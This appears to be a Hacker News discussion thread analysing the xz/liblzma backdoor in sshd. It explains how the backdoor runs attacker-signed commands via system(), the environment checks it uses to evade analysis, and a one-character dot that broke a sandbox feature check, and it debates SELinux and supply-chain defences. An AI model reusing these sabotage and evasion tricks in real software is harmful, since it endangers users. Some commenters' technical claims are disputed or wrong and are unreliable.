One have question on this is, if the backdoor would not been discovered due to performance issue (which was as I understood it purely an oversight/fixable deficiency in the code), what are the chances of discovering this backdoor later, or are there tools that would have picked it up? Those questions are IMO relevant to understand if this kind of backdoor is the first one of the kind, or the first one that was uncovered.
EDIT: Here's some more RE work on the matter. Has some symbol remapping information that was extracted from the prefix trie the backdoor used to hide strings. Looks like it tried to hide itself even from RE/analysis, too.
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9...
Full list of decoded strings here:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
--
For someone unfamiliar with openssl's internals (like me): The N value, I presume, is pulled from the `n` field of `rsa_st`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which is a `BIGNUM`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which appears to be a variable length type.
The back door pulls this from the certificate received from a remote attacker, attempts to decrypt it with ChaCha20, and if it decrypts successfully, passed to `system()`, which is essentially a simple wrapper that executes a line of shellscript under whichever user the process is currently executing.
If I'm understanding things correctly, this is worse than a public key bypass (which myself and I think a number of others presumed it might be) - a public key bypass would, in theory, only allow you access as the user you're logging in with. Assumedly, hardened SSH configurations would disallow root access.
However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
Wild. This is about as bad as a widespread RCE can realistically get.
However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
With the right sandboxing techniques, SELinux and mitigations could prevent the attacker from doing anything with root permissions. However, applying a sandbox to an SSH daemon effectively is very difficult.
Could you explain how SELinux could ever sandbox against RCE in sshd? Its purpose is to grant login shells to arbitrary users, after all.
You could refactor sshd so most network payload processing is delegated to sandboxed sub-processes. Then an RCE there has less capabilities to exploit directly. But, I think you would have to assume an RCE can cause the sub-process to produce wrong answers. So if the answers are authorization decisions, you can transitively turn those wrong answers into RCE in the normal login or remote command execution context.
But, the normal login or remote command execution is at least audited. And it might have other enforcement of which accounts or programs are permitted. A configuration disallowing root could not be bypassed by the sub-process.
You could also decide to run all user logins/commands under some more confined SE-Linux process context. Then, the actual user sessions would be sandboxed compared to the real local root user. Of course, going too far with this may interfere with the desired use cases for SSH.
I thought that OpenSSH's sshd already separates itself into a privileged process and a low-privilege process. I don't know any details about that. Here's what Google showed me for that: https://github.com/openssh/openssh-portable/blob/master/READ...
If you look at the diagram of privsep, the authentication process is part of the privileged binary, which is where this RCE lives
The signature validation could be moved into an unprivileged process forked from that one.
That's an easy thing to say after the fact indeed but yes. In fact after such a disastrous backdoor I wouldn't be surprised if OpenSSH moved all code calling external libraries to unprivileged processes to make sure such an attack can never have such a dramatic effect (an auth bypass would still likely be possible, but that's still way better than a root RCE…).
At this point “All libraries could be malicious” is a threat model that must be considered for something as security critical as OpenSSH.
I don't think that's a threat model that OpenSSH should waste too much time on. Ultimately this is malicious code in the build machine compiling a critical system library. That's not reasonable to defend against.
Keep in mind that upstream didn't even link to liblzma. Debian patched it to do so. OpenSSH should defend against that too?
It is possible to prevent libraries from patching functions in other libraries; make those VM regions unwritable, don't let anyone make them writable, and adopt PAC or similar hardware protection so the kernel can't overwrite them either.
That does not sound like the type of machine that I want to work on. I still require a general purpose computer.
Why does a general purpose computer need to overwrite crypto functions in sshd?
That's already done, but in this case the attack happened in a glibc ifunc and those run before the patching protection is enabled (since an ifunc has to patch the PLT).
any one of us if we sat on the OSSH team would flip the middle finger. What code is the project supposed to write when nothing on main dyn loaded liblzma. It was brought in from a patch they don't have realistic control over.
This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
Not at all, it is a distro issue because a few distros such as Debian chose to patch openssh to bring in systemd support [1].
Other systemd-based distros like Arch Linux remains unaffected because they don't carry this patch.
1: https://sources.debian.org/src/openssh/1%3A9.7p1-2/debian/pa...
Yet Redhat and others applied this patch, as systemd is so incapable of reliably launching processes, that it kept killing sshd without it.
What a complete failure of an init system's job, and the patch was applied due to systemd not resolving the issue in another way.
This is the problem with systemd. Way, way way too much complexity.
Brought in from a patch they rejected to accept because of this exact risk
Openssh has refused this patch that enables this in Debian multiple times as acrisk of preauth code execution as root.
So maybe just don't patch sshd?
It wouldn't matter in this case, since the exploit could simply rewrite the function that calls out to the unprivileged process. If you already have malicious code in your privileged parent process there's no way to recover from that.
Exactly. The attack came in by hitching a ride on to systemd.
sshd is not the problem. the ldd/monolith architecture surrounding systemd is.
What if I duplicated this attack but instead targeted dbus or any other thing that systemd is managing?
No, the problem is that someone had access to backdoor code that runs in a privileged process.
That just raises the hurdle for the attacker. The attacker in this case has full control to replace any function within ssh with their own version, and the master process of sshd will always need the ability to fork and still be root on the child process before dropping privileges. I don't see any way around that. They only needed to override one function this time, but if you raise the bar they would just override more functions and still succeed.
I’m highly safety critical systems you have software (and hardware) diversity were multiple pieces of software, developed independently, have to vote on the result. Maybe highly critical pieces of Linux like the login process should be designed the same way. So that two binaries without common dependencies would need to accept the login for the user to get privileges.
Exactly how to do it (especially transparently for the user), I have no idea though. Maybe sending ssh login requests to two different sshd implementations and if they don’t do the same things (same system calls), they are both killed.
Or some kind of two step login process where the first login only gives access to the sandbox of the second login process.
But in general I assume the Linux attack surface is too big to do software diversity for all of it.
login process
RCE doesn't really follow a login process design. As soon as you got RCE you can be considered pwned.
If not now, then at the time the next locally exploitable vulnerability comes up. There are plenty.
The attacker in this case has full control to replace any function within ssh with their own version
Not true. They have this ability only for binaries that are linked to liblzma. If sshd were to be decomposed into multiple processes, not all of them would (hopefully) depend on all the libraries that the original sshd depended on.
It's possible to spawn a sshd as an unprivileged or partially-capabilitized process. Such as sandbox isn't the default deployment, but it's done often enough and would work as designed to prevent privilege elevation above the sshd process.
How can sshd spawn interactive sessions for other users if it's sandboxed?
SELinux does not rely on the usual UID/GID to determine what a process can do. System services, even when running as "root", are running as confined users in SELinux. Confined root cannot do anything which SELinux policy does not allow it to do. This means you can let sshd create new sessions for non-root users while still blocking it from doing the other things which unconfined root would be able to do. This is still a lot of power but it's not the godlike access which a person logged in as (unconfined) root has.
Doesn't matter. A malicious sshd able to run commands arbitrary users can just run malicious commands as those users.
We'd need something more like a cryptographically attested setreuid() and execve() combination that would run only commands signed with the private key of the intended user. You'd want to use a shared clock or something to protect against replay attacks
Yes, this won't directly protect against an attacker whose goal is to create a botnet, mine some crypto on your dime, etc. However, it will protect against corruption of the O/S itself and, in tandem with other controls, can limit the abilities an attacker has, and ensure things like auditing are still enforced (which can be tied to monitoring, and also used for forensics).
Whether it's worth it or not depends on circumstances. In many cloud environments, nuking the VM instance and starting over is probably easier than fiddling with SELinux.
even easier is to STOP HOSTING SSHD ON IPV4 ON CLEARNET
at minimum, ipv6 only if you absolutely must do it (it absolutely cuts the scans way down)
better is to only host it on vpn
even better is to only activate it with a portknocker, over vpn
even better-better is to set up a private ipv6 peer-to-peer cloud and socat/relay to the private ipv6 network (yggdrasil comes to mind, but there's other solutions to darknet)
your sshd you need for server maintenance/scp/git/rsync should never be hosted on ipv4 clearnet where a chinese bot will find it 3 secs after the route is established after boot.
How about making ssh as secure as (or more secure than) the VPN you'd put it behind? Considering the amount of vulnerabilities in corporate VPNs, I'd even put my money on OpenSSH today.
It's not like this is SSH's fault anyway, a supply chain attack could just as well backdoor some Fortinet appliance.
Defence in depth. Which of your layers is "more secure" isn't important if none are "perfectly secure", so having an extra (independent) layer such as a VPN is a very good idea.
Honestly the only VPN I'd rank above ssh in terms of internet-worthiness is WireGuard.
Who cares about scans? Who cares if a scan comes in 4 or 6?
Forget IPv6, just moving SSH off of port 22 stops the vast majority of drive-by attacks against sshd on the open Internet.
OpenSSH has a much smaller attack surface, is thoroughly vetted by the best brains on the planet, and is privilege separated and sandboxed. What VPN software comes even close to that?
The only software remotely in the same league is a stripped down Wireguard. There is a reason the attacker decided to attack liblzma instead of OpenSSH.
Plausibly by having set-user-ID capability but not others an attacker might need.
But in the more common case it just doesn't: you have an sshd running on a dedicated port for the sole purpose of running some service or another under a specific sandboxed UID. That's basically the github business model, for example.
I need full filesystem access, VIM, ls, cd, grep, awk, df, du at the very least. Sometimes perl, find, ncdu, and other utilities are necessary as well. Are you suggesting that each tool have its own SSH process wrapping it?
Maybe write a shell to coordinate between them? It should support piping and output redirection, please.
Sigh. I'm not saying there's a sandboxed sshd setup that has equivalent functionality to the default one in your distro. I'm not even saying that there's one appropriate for your app.
I'm saying, as a response to the point above, that sandboxing sshd is absolutely a valid defense-in-depth technique for privilege isolation, that it would work against attacks like this one to prevent whole-system exploitation, and that it's very commonly deployed in practice (c.f. running a git/ssh server a-la github).
Git’s use of the ssh protocol as a transport is a niche use case that ignores the actual problem. No one is seriously arguing that you can’t sandbox that constrained scenario but it’s not really relevant since it’s not the main purpose of the secure shell daemon.
The focus on the first S is good, yes, but SSH has another S and an H that needs focus as well.
Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc. However, you could only really sandbox sshd-as-root. In order for sshd to do its job, it does need to be able to masquerade as arbitrary non-root users. That's still pretty bad but generally not "undetectably alter the operating system or firmware" bad.
Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc
This is sort of overlooking the problem. While true, the processes spawned by sshd do need to be able to do all these things and so even if you did sandbox it, preserving functionality would all but guarantee an escape is trivial (...just spawn bash?).
SELinux context is passed down to child processes. If sshd is running as confined root (system_u:system_r:sshd_t or similar), then the bash spawned by RCE will be too. Even if sshd is allowed to masquerade as an unconfined non-root user, that user will (regardless of SELinux) be unable to read or write /dev/kmem, ignore standard file permissions, etc.
I’ll admit to not being an expert in SELinux, but it seems like an impossibly leaky proposition. Root can modify systemd startup files, so just do that in a malicious way and reboot the system. that context won’t be propagated. And if you somehow prohibit root from doing that by SELinux policy then you end up with a system that can’t actually be administered.
[edit: sibling sweetjuly said it better than I could. I doubt that this much more than a fig leaf on any real world system given what sshd is required to have to do.]
Selinux domains are uncoupled from Linux users. If sshd does not have Selinux permissions to edit those files it will simply be denied. Even if sshd is run as root
Which amounts to the un-administerable system I mentioned. If it’s not possible to modify systemd config files using ssh, what happens when you need to edit them?
Really what they're proposing here is a non-modifiable system, where the root is read-only and no user can modify anything important.
Which is nice and all, but that implies a "parent" system that creates and deploys those systems. Which people likely want remote access to.. Probably by sshd...
You don't have to have an immutable system.
You can limit the exposure of the system from RCE in sshd with SELinux without preventing legitimate users from administering the system.
Granted that SELinux is overly complicated and has some questionable design decisions from a usability standpoint but it's not as limited or inflexible as many seem to think.
It really can stop a system service running as "root" from doing things a real administrator doesn't want it to do. You can couple it with other mechanisms to achieve defense in depth. While any system is only as strong as its weakest link, you can use SELinux to harden sshd so even with exploits in the wild it's not the weakest link vis-a-vis an attacker getting full unconfined root access. This may or may not be worth your time depending on what that box is doing and how connected to the rest of your infrastructure it is.
There seems to be a pervasive misunderstanding of the difference between standard UNIX/Linux discretionary access control and SELinux-style mandatory access control. The latter cannot be fooled into acting as a confused deputy anywhere near as easily as the former. The quality of the SELinux policy on a particular system plays a big part in how effective it is in practice but a good policy will be far harder to circumvent than anything the conventional permissions model is capable of.
Moreover, while immutability is obviously an even stronger level of protection, it is not necessary to make the system immutable to accomplish what I've described here while still allowing legitimately and separately authenticated users to fully administer the system.
SELinux is overly complicated, but it’s not hard to at least grasp the basics
The amount of people confusing DAC and MAC is concerning. You’ve done an excellent job explaining the topic.
Those files would be editable by something in the sysadm_t domain which is by default the domain of the root user after a successful authentication
This backdoor does not bypass remote authentication so it should be able to transition to the new domain that has access to these files
That's my point though--users expect to be able to do those things over ssh. Sandboxing sshd is hard because its child processes are expected to be able to do anything that an admin sitting at the console could do, up to and including reading/writing kernel memory.
I'm assuming SSH root login is disabled and sudo requires separate authentication to elevate, but yeah, if there's a way to elevate yourself to unconfined root trivially after logging in, this doesn't buy you anything.
Now, sandboxing sudo (in the general case) with SELinux probably isn't possible.
This does not matter either. The attack came in by loading into systemd via liblzma. It put on a hook and then sits around waiting for sshd to load in so it can learn the symbols then proceeds to swap in the jumps.
sshd is a sitting duck. Bifurcating sshd into a multimodule scheme won't work because some part of it still has to be loaded by systemd.
This is a web of trust issue. In the .NET world where refection attacks happen to commercial software that features dynload assemblies, the only solution they could come up with is to sign all the things, then box up anything that doesn't have a signing mechanism and then sign that, even signing plain old zip files.
Some day we will all have to have keys, and to keep the anon people from leaving they can get an anon key, but anons with keys will never get on the chain where the big distros would ever trust their commits until someone who forked over their passport and photos got a trustable key to sign off on the commits, so that the distro builders can then greenlight pulling it in.
Then I guess to keep the anons hopeful that they are still in the SDLC somewhere their commits can go into the completely untrusted-unstable-crazytown release that no instutution in their right mind would ever lay down in production.
Do you think state actors won’t just print out random passports?
Anons will just steal identities, and randos will get accused of hacking they didn't do.
You can definitely prevent a lot of file/executable accesses via SELinux by running sshd in the default sshd_t or even customizing your own sshd domain and preventing sshd from being able to run binaries in its own domain without a transition. What you cannot prevent though is certain things that sshd _requires_ to function like certain capabilities and networking access.
by default sshd has access to all files in /home/$user/.ssh/, but that could be prevented by giving private keys a new unique file context, etc.
SELinux would not prevent all attacks, but it can mitigate quite a few as part of a larger security posture
https://news.ycombinator.com/item?id=39879559
> Libselinux pulls in liblzma too
libselinux is the userspace tooling for selinux, it is irrelevant to this specific discussion as the backdoor does not target selinux in any way, and sshd does not have the capabilities required to make use of the libselinux tooling anyway
libselinux is just an unwitting vector to link liblzma with openssh
With the right sandboxing techniques, SELinux and mitigations could prevent the attacker from doing anything with root permissions.
Please review this commit[0] where the sandbox detection was “improved”.
[0] https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2...
I can't blame anyone who has missed that dot dissimulated at the beginning of the line.
https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd...
For people like me whose C knowledge is poor, can you explain why this dot is significant? What does it do in actuality?
You are looking at a makefile, not C. The C code is in a string that is being passed to a function called `check_c_source_compiles()`, and this dot makes that code not compile when it should have -- which sets a boolean incorrectly, which presumably makes the build do something it should not do.
Interesting that validating the failure reason of an autotools compile check could be a security mitigation...
This is something that should have unit/integration tests inside the tooling itself, yeah. If your assertion is that X function is called / in the environment X then the function should return Y then that should be a test especially when it’s load-bearing for security.
And tooling is no exception either. You should have tests that your tooling does the things it says on the tin and that things happen when flags are set and things don’t happen when they’re not set, and that the tooling sets the flags in the way you expect.
These aren’t even controversial statements in the JVM world etc. Just C tooling is largely still living in the 70s apart from abortive attempts to build the jenga tower even taller like autotools/autoconf/cmake/etc (incomprehensible, may god have mercy on your build). At least hand written make files are comprehensible tbh.
It's a "does this compile on this platform" test, not a "does this function return what we expect" test.
Unfortunately in the world of autoconf and multiple platforms and compilers, there was no standard way to understand why the compilation failed.
Cmake actually but yes
As far as I can tell, the check is to see if a certain program compiles, and if so, disable something. The dot makes it so that it always fails to compile and thus always disables that something.
if a certain program compiles, and if so, disable something.
Tiny correction: [...] enable something.
The idea is: If that certain program does not compile it is because something is not available on the system and therefore needs to be disabled.
That dot undermines that logic. The program fails because of a syntax error caused by the dot and not because something is missing.
It is easy to overlook because that dot is tiny and there are many such tests.
I had a similar problem with unit testing of a library. Expected failures need to be tested as well. As an example imagine writing a matrix inversion library. Then you need to verify that you get something like a division by zero error if you invert the zero matrix. You write a unit test for that and by mistake you insert a syntax error. Then you run the unit test and it fails as expected but not in the correct way.
It's subtle. It fails as expected but it fails because of unexpected wrong causes.
The solution: Check the errors carefully!
The solution: Check the errors carefully!
The desire for "does this compile on this platform" checks comes from an era where there was pretty much no way to check the error. Somebody runs it on HP-UX with the "HP-UX Ansi C Compiler" they licensed from HP and the error it spits out isn't going to look like anything you recognize.
It's part of a test program used for feature detection (of a sandboxing functionality), and causes a syntax error. That in turn causes the test program to fail to compile, which makes the configure script assume that the sandboxing function is unavailable, and disables support for it.
I specifically opened this diff to search for a sneaky dot, knowing it’s there, and wasn’t able to find it until I checked the revert patch
Same, I knew a sneaky dot was in the diff but had to ctrl-f the diff to find it.
Oh, that one is interesting, because it only breaks it in cmake.
I wonder if there is anything else cmake related that should be looked at.
Wasn't cmake support originally added to xz to use with Windows and MSVC?
But that's a check for a Linux feature. So the more interesting question would be, what in the Linux world might be building xz-utils with cmake, I guess using ExternalProject_Add or something similar.
Yes this is Linux.
At this time we don't know exactly how much is affected and what originally drew the attention of the attacker(s).
Yes, but don't forget that there are different kinds of sandboxes. SELinux never needs the cooperation of any program running on the system in order to correctly sandbox things. No change to Xz could ever make SELinux less effective.
But don't forget that xz is also used as part of dpkg for unpacking packages. The whole purpose of dpkg is to update critical system packages. Any SELinux policy that protects from a backdoored dpkg/xz installing a rootkit during the next kernel security update; will also prevent installing real kernel security updates.
The particular way of attack in this OpenSSH backdoor can maybe be prevented; but we've got to realize that the attacker already had full root permissions and there's no way of protecting from that.
SELinux policies are much more subtle than that. You don’t restrict what xz or liblzma can do, you restrict what the whole process can do. That process is either sshd or dpkg, and you can give them completely different access to the system, so that if dpkg tries to launch an interactive shell it fails, while sshd fails if it tries to overwrite a system file such as /bin/login or whatever. Neither would ordinarily do that, but the payload delivered via the back door might attempt it and wouldn’t succeed. And you would get a report stating what had happened, so if you’re paying attention the back door starts to become obvious.
Also I think dpkg switched to Zstd, didn’t it? Or am I misremembering?
But you’re not wrong; ultimately both sshd and dpkg are critical infrastructure. SELinux can prevent them from doing completely wrong things, but obviously it wouldn’t be useful for it to prevent them from doing their jobs. And those jobs are security critical already. SELinux is not a panacea, merely defense in depth.
That one's a separate attack vector, which is seemingly unused in the sshd attack. It only disables sandboxing of the xzdec(2) utility, which is not used in the sshd attack.
Which strongly suggests that they planned and/or executed more backdoors via Jia Tan’s access.
I guess xzdec was supposed to sandbox itself where possible so they disabled the sandbox feature check in the build system so that future payload exploits passed to xzdec wouldn’t have to escape the sandbox in order to do anything useful?
Sneaky.
Well, the definition of "improve" depends on one's goals.
Doesn't matter. This is a supply chain attack, not a vulnerability arising from a bug. All sandboxing the certificate parsing code would have done is make the author of the backdoor do a little bit more work to hijack the necessarily un-sandboxed supervisor process.
Applying the usual exploit mitigations to supply chain attacks won't do much good.
What will? Kill distribution tarballs. Make every binary bit for bit reproducible from a known git hash. Minimize dependencies. Run whole programs with minimal privileges.
Oh, and finally support SHA2 in git to forever forestall some kind of preimage attack against a git commit hash.
Oh boy, do I have the packaging system for you!
Right, though if I'm understanding correctly, this is targeting openssl, not just sshd. So there's a larger set of circumstances where this could have been exploited. I'm not sure if it's yet been confirmed that this is confined only to sshd.
The exploit, as currently found, seems to target OpenSSH specifically. It's possible that everything involving xz has been compromised, but I haven't read any reports that there is a path to malware execution outside of OpenSSH.
A quote from the first analysis that I know of (https://www.openwall.com/lists/oss-security/2024/03/29/4):
Initially starting sshd outside of systemd did not show the slowdown, despite the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder.
a) TERM environment variable is not set
b) argv[0] needs to be /usr/sbin/sshd
c) LD_DEBUG, LD_PROFILE are not set
d) LANG needs to be set
e) Some debugging environments, like rr, appear to be detected. Plain gdb appears to be detected in some situations, but not others
Another reason to adopt OpenBSD style pledge/unveil in Linux.
Would that help? sshd, by design, opens shells. the backdoor payload was basically to open a shell. that is, the very thing that sshd has to do.
The pledge/unvail system is pretty great, but my understanding is that it do not do anything that the linux equivalent interfaces(seccomp i think) cannot do. It is just a simplified/saner interface to the same problem of "how can a program notify the kernel what it's scope is?" The main advantage to pledge/unveil bring to the table is that they are easy to use and cannot be turned off, optional security isn't.
sshd is probably the softest target on most systems. It is generally expected (and setup by default) so that people can gain a root shell that provides unrestricted access.
sshd.service will typically score 9.6/10 for "systemd-analyze security sshd.service" where 10 is the worst score. When systemd starts a process, it does so by using systemd-nspawn to setup a (usually) restricted namespace and apply seccomp filters before the process is then executed. seccomp filters are inherited by child processes, which can then only further restrict privileges but not expand upon the inherited privileges. openssh-portable on Linux does apply seccomp filters to child processes but this is useless in this attack scenario because sshd is backdoored by the xz library, and the backdoored library can just disable/change those seccomp filters before sshd is executed.
sshd is particularly challenging to sandbox because if you were to restrict the namespace and apply strict seccomp filters via systemd-nspawn, a user gaining a root shell via sshd (or wanting to sudo/su as root) is then perhaps prevented from remotely debugging applications, accessing certain filesystems, interacting with network interfaces, etc depending on what level of sandboxing is applied from systemd-nspawn. This choice is highly user dependent and there are probably only limited sane defaults for someone who has already decided they want to use sshd. For example, sane defaults could include creating dedicated services with sandboxing tailored just for read-only sftp user filesystem access, a separate service for read/write sftp user filesystem access, sshd tunneling, unprivileged remote shell access, etc.
So for all practical purposes you can't sandbox ssh on a developer's machine much.
This is what PrivSep was supposed to do. sshd could fork an unprivileged and restricted process to do the signature validation, I suppose.
Mind boggling. How do you even decide what to do with privileges on a billion computers?
There's a reasonably high chance this was to target a specific machine, or perhaps a specific organization's set of machines. After that it could probably be sold off once whatever they were using it for was finished.
I doubt we'll ever know the intention unless the ABC's throw us a bone and tell us the results of their investigation (assuming they're not the ones behind it).
ABC?
3 letter intelligence agencies.
Baw, GCHQ is going to feel so left out.
NSA, CIA, FBI, DHS.
I'd disagree, based on reports of the actor trying to get this upstreamed in Debian and Fedora. Widespread net.
Classic example of this being Stuxnet, a worm that exploited four(!) different 0-days and infected hundreds of thousands of computers with the ultimate goal of destroying centrifuges associated with Iran’s nuclear program.
There aren’t a billion computers running ssh servers and the ones that do should not be exposed to the general internet. This is a stark reminder of why defense in depth matters.
Government organizations have many different teams. One might develop vulnerabilities while another runs operations with oversight for approving use of exploits and picking targets. Think bureaucracy with different project teams and some multi-layered management coordinating strategy at some level.
Can someone explain succinctly what the backdoor does? Do we even know yet? The backdoor itself is not a payload, right? Does it need a malicious archive to exploit it? Or does it hook into the sshd process to listen for malicious packets from a remote attacker?
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Basically, how does an attacker control a machine with this backdoor on it?
You can imagine a door that opens if you knock on it just right. For anyone without the secret knock, it appears and functions as a wall. Without the secret knock, there might not even be a way to prove it opens at all.
This is sort of the situation here. xz tries to decode some data before it does anything shady; since it is asymmetric; it can do the decryption without providing the secret encryption key (it has the public counterpart).
The exploit code may never be available, because it is not practical to find the secret key, and it doesn't do anything obviously different if the payload doesn't decrypt successfully. The only way to produce the exploit code would be if the secret key is found somehow; and the only real way for that to happen would be for the people who developed the backdoor to leak it.
Private key. In cryptography we distinguish keys which are symmetric (needed by both parties and unavailable to everyone else) as "Secret" keys, with the pair of keys used in public key cryptography identified as the Private key (typically known only to one person/ system/ whatever) and Public key (known to anybody who cares)
Thus, in most of today's systems today your password is a secret. You know your password and so does the system authenticating you. In contrast the crucial key for a web site's HTTPS is private. Visitors don't know this key, the people issuing the certificate don't know it, only the site itself has the key.
I remember this by the lyrics to "The Fly" by the band U2, "They say a secret is something you tell one other person. So I'm telling you, child".
You know your password and so does the system authenticating you.
Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
The difference is that there is no two passwords that collide; but there are hashes that may.
And that two equal passwords from two equal users are not necessarily accessible to someone with the hash list because they are modified at rest with salts.
Nitpick, but no it shouldn’t. The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
I never understood why clients are coded this way. It's trivially easy to send the salt to the client and have it do the hashing. Though I guess it doesn't really improve security in a lot of cases, because if you successfully MITM a web app you can just serve a compromised client.
I never understood why clients are coded this way.
Because it makes things less secure. If it was sufficient to send the hash to the server to authenticate, and the server simply compares the hash sent by the user with the hash in its database, then the hash as actually the password. An attacker doesn't need to know the password anymore, as the hash is sufficient.
Hashing was introduced precisely because some vulnerabilities allow read access to the database. With hashed passwords, the attacker in such a situation has to perform a password guessing attack first to proceed. If it was sufficient to send the hash for authentication, the attacker would not need to guess anything.
To really nitpick the server does have the password during authentication. The alternate would be a PAKE which is currently quite rare. (But probably should become the standard)
I was going more for shouldn’t. You’re right, but for zero knowledge things like password managers where they specifically do not want your password.
You never submit your password, you submit that hash and they compare it.
That's not true. If that were the case, the hash is now the password and the server stores it in clear text. It defeats the entire purpose of hashing passwords.
Side note: that is (almost) how NTLM authentication works and why pass-the-hash is a thing in Windows networks.
More an implementation detail than a conceptual distinction, though.
I have often seen the secret component of an asymmetric key pair referred as secret key as well. See libsodium for example. Maybe it's because curve/ed 25519 secrets are 32 random bytes unlike RSA keys which have specific structure which makes them distinct from generic secrets.
It also allows "pk" and "sk" as overly short variable names, an argument developpers are sometimes tempted by!
Absolutely, it's very convenient when working on a whiteboard :)
Private keys are also “secrets” here in the security world.
“Vault secures, stores, and tightly controls access to tokens, passwords, certificates, API keys, and other secrets in modern computing”
Your distinction is not shared by the industry so it’s not something helpful to correct people on.
I don't think I can take seriously in this context a quote in which certificates (a type of public document) are also designated "secrets".
Like, sure, they're probably thinking of PKCS#12 files which actually have the private key inside them, not just the certificate, but when they are this sloppy of course they're going to use the wrong words.
I understand that we may never see the secret knock but shouldn't we have the door and what's behind it now? Doesn't this mean that the code is quite literally too hard to figure out for a human being? It's not like he can send a full new executable binary that he simply executes, then we'd see that the door is e.g the exec() call. Honestly this attempt makes me think that the entire c/c++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh but it's possible because it's written in c/c++.
Can we stop the ridiculous C++ fearmongering? You can make vulnerable software in any language, and you can do social engineering on any software.
The people who are busy inserting backdoors in all the "rewrite it in rust" projects where anonymous never heard from before new to programming randos rewrite long trusted high security projects in rust would presumably very much like everyone elses attention directed elsewhere.
The "stuff behind the door" is conveniently uploaded with the secret knock. It's not there and it will never be because it's remotely executed without getting written down. The attacker does send executable code, singed and encrypted (or only one of them? It does not matter) with their private key. The door checks anything incoming for a match with the public key it has and executes when happy.
C++ has nothing to do with this, it's the dynamic linking mechanism that allows trusted code the things it allows trusted code to do (talking about the hooking that makes the key check possible, not about the execution that comes after - that is even more mundane, code can execute code, it's a von Neumann architecture after all).
It's not too hard to figure out. People are figuring it out. If anything is too hard, it's due to obfuscation - not C/C++ shenanigans. As far as I understand from scrolling through these comments, an attacker can send a command that is used with the system() libc call. So the attacker basically has a root shell.
This is literally what the top post link is about. The backdoor functionality has been (roughly) figured out: after decryption and signature verification it passes the payload received in the signing key of the clients authentication certificate to system().
C/C++ is not a problem here because sshd has to run things to open sessions for users.
The payload is simply remote code execution. But we'll never know the secret knock that triggers it, and we can't probe existing servers for the flaw because we don't konw the secret knock.
I imagine that we could in short order build ourselves a modified version of the malware, which contains a different secret knock, one that we know in advance, and then test what would have happened with the malware when the secret knock was given. But this still doesn't help us probe existing servers for the flaw, because those servers aren't running our modified version of the malware, they're running the original malware.
All analogies are flawed, and we are rapidly approaching the point of madness.
Still, let me try. In this case, someone on the inside of the building looked in a dusty closet and saw a strange pair of hinges on the wall of the closet. Turns out that the wall of the closet is an exterior wall adjoining the alley back behind the building! At least they know which contractor built this part of the building.
Further examination revealed the locking mechanism that keeps the secret door closed until the correct knock is used. But because the lock is based on the deep mathematics of prime numbers, no mere examination of the lock will reveal the pattern of locks that will open it. The best you could do is sit there and try every possible knocking pattern until the door opens, and that would take the rest of your life, plus the rest of the lifetime of the Earth itself as well.
Incidentally, I could write the same exploit in rust or any other safe language; no language can protect against a malicious programmer.
As for detecting use of the back door, that's not entirely out of the question. However it sounds like it would not be as easy as logging every program that sshd calls exec on. But the audit subsystem should notice and record the activity for later use in your post–mortem investigation.
Honestly this attempt makes me think that the entire c/c++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh but it's possible because it's written in c/c++.
Nothing about this relies on a memory safety exploit. It's hard to figure out because it's a prebuilt binary and it's clever. Unless you meant "all compiled languages" and not C/C++ specifically, it's irrelevant.
The right thing to argue against based on your instinct (no one can figure out what is going on) is: it should be unacceptable for there to be prebuilt binaries committed to the source code.
Nothing here is something that could not be done in other languages. For example in Rust auditing this kind of supply chain attack is even more nightmarish if the project uses crates, as crates often are very small causing the "npm effect".
Another good example is docker images. The way people often build docker images is not that they are build all the way from the bottom. The bottom layer(s) is/are often some arbitrary image from arbitrary source which causes a huge supply chain attack risk.
I could be wrong, buy my understanding is that it isn't even a door. It simply allows anyone that has a certain private key, to send a payload that the server will execute. This won't produce any audit of someone logging in, you won't see any session etc.
Any Linux with this installed would basically become a bot that can be taken over. Perhaps they could send a payload to make it DDoS another host, or payload to open a shell or payload that would install another backdoor with more functionality, and to draw attention away from this one.
In a way this is really responsible backdoor. In the end this is even less dangerous than most unreported 0-days collected by public and private actors. Absurdly, I would feel reasonably safe with the compromised versions. Somebody selling botnet host would never be so careful to limit collateral damage.
It looks like the exploit path calls system() on attacker supplied input, if the check passes. I don't think we need to go into more detail than "it does whatever the attacker wants to on your computer, as root".
I don't think we know what exactly this does, yet. I can only answer one of those questions, as far as I understand the "unreplayable" part is refering to this:
Apparently the backdoor reverts back to regular operation if the payload is malformed or *the signature from the attacker's key doesn't verify*.
emphasis mine, note the "signature of the attacker's key". So unless that key is leaked, or someone breaks the RSA algorithm (in which case we have far bigger problems), it's impossible for someone else (researcher or third-party) to exploit this backdoor.
This feels very targeted
Or very untargeted. Something intended just to lay dormant by chance if succeeded...
It is very good backdoor to have if you at whatever time have dozens of options. See sshd running, test this you are done if it works, if not move to something else.
Or targeted not really at doing anything but at researching the nature of supply chain vulnerabilities themselves.
This doesn't look like a research.
